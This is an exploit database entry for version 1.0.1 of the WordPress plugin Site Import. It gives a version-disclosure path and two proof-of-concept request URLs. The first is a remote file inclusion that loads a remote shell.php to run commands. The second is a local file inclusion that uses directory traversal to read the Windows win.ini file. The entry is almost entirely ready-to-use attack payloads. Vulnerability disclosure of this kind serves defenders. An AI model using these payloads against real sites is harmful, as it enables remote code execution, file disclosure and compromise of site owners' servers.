Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
# Exploit Title: Wordpress Site Import 1.0.1 | Local and Remote file inclusion # Exploit Author: Wadeek # Website Author: https://github.com/Wad-Deek # Software Link: https://downloads.wordpress.org/plugin/site-import.1.0.1.zip # Version: 1.0.1 # Tested on: Xampp on Windows7 [Version Disclosure] ====================================== /wp-content/plugins/site-import/readme.txt ====================================== [PoC] ====================================== Remote File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini ======================================